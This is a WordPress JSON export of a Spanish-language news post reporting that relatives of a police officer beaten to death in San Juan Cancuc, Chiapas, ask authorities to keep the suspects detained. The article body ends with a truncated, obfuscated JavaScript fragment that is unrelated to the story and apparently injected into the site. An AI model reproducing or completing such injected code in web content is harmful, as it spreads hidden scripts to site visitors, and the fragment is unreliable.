{"id":2554,"date":"2022-06-02T00:42:41","date_gmt":"2022-06-02T00:42:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2554"},"modified":"2022-06-02T00:42:42","modified_gmt":"2022-06-02T00:42:42","slug":"piden-que-asesinato-de-policia-no-quede-impune","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2554","title":{"rendered":"Piden que asesinato de polic\u00eda no quede impune"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"750\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220601-WA0055.jpg\" alt=\"\" class=\"wp-image-2555\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220601-WA0055.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220601-WA0055-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220601-WA0055-768x576.jpg 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>01 de Junio del 2022. San Crist\u00f3bal de Las Casas.- Familiares de qui\u00e9n en vida respondiera al nombre Antonio Aguilar P\u00e9rez, Polic\u00eda municipal en San Juan Cancuc, pidieron a las autoridades de Justicia, se aplique la ley en contra de las tres personas que ya est\u00e1n detenidas y los que resulten responsable, se\u00f1alados de haberlo golpeado hasta causarle la muerte en el Barrio K\u2019 ani, de aquel Municipio, ignor\u00e1ndose el motivo, alrededor de las 3 de la ma\u00f1ana del pasado domingo 29 de mayo.\u00a0<\/p>\n\n\n\n<p>En conferencia de prensa, los familiares narraron que las personas que lo golpearon jam\u00e1s argumentaron el motivo de la retenci\u00f3n, y quienes para su liberaci\u00f3n ped\u00edan la cantidad de 10 mil pesos como una multa que no pagaron.<\/p>\n\n\n\n<p>&#8220;Le quiero pedir al gobernador del estado Rutilio Escandon, al Fiscal General del Estado, al Tribunal, al fiscal de justicia indigena, al juez que no vayan a liberar los que mataron a mi esposo, ya que tenemos entendido que algunas organizaciones como sentimiento de la naci\u00f3n, el padre Marcelo y el Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas, est\u00e1n pidiendo la liberaci\u00f3n de los detenidos por homicidio, est\u00e1n pidiendo que se liberen los delincuentes, los que lo mataron a golpes&#8221;, dijo la viuda.&nbsp;<\/p>\n\n\n\n<p>Fueron elementos de la Polic\u00eda Muncipal en conjunto con elementos de la Guardia Nacional y Sedena, que rescataron a Antonio Aguilar, alrededor de las 6 de la ma\u00f1ana del mismo d\u00eda.<\/p>\n\n\n\n<p>&#8220;Pido que se aplique todo el peso de la ley las personas que privaron de la vida a mi esposo, queremos justicia, pido a los organismos de derechos humanos defiendan mis derechos humanos como Victima&#8221;, a\u00f1adi\u00f3&nbsp; con l\u00e1grimas&nbsp; en los ojos .&nbsp;<\/p>\n\n\n\n<p>Los familiares hicieron un llamado respetuoso al gobernador de Chiapas, al Fiscal, tome cartas en el asunto y no sean liberados los responsables y se aplique todo el peso de la ley.<\/p>\n\n\n\n<p>El hoy occiso dej\u00f3 7 hijos en la orfandad, y&nbsp; una viuda, quienes temen por su integridad, ya que saben un grupo est\u00e1 buscando sean liberados, usando la fuerza.&nbsp;<\/p>\n\n\n\n<p>&#8220;Pido al centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas, que defienda los derechos humanos de la familia del hoy occiso, y no est\u00e9n defendiendo a los delincuente. Estas personas que est\u00e1n detenidos son delincuentes, no es la primera vez que golpean y matan, piden multa a las personas que llegan al barrio K\u2019ani, y algunos tienen orden de aprehensi\u00f3n&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 01 de Junio del 2022. San Crist\u00f3bal de Las Casas.- Familiares de qui\u00e9n en vida respondiera al nombre Antonio Aguilar P\u00e9rez, Polic\u00eda municipal en San Juan Cancuc, pidieron a las autoridades de Justicia, se aplique la ley en contra de las tres personas que ya est\u00e1n detenidas y los que resulten responsable, se\u00f1alados &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2555,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2554","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2554"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions"}],"predecessor-version":[{"id":2556,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2554\/revisions\/2556"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2555"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}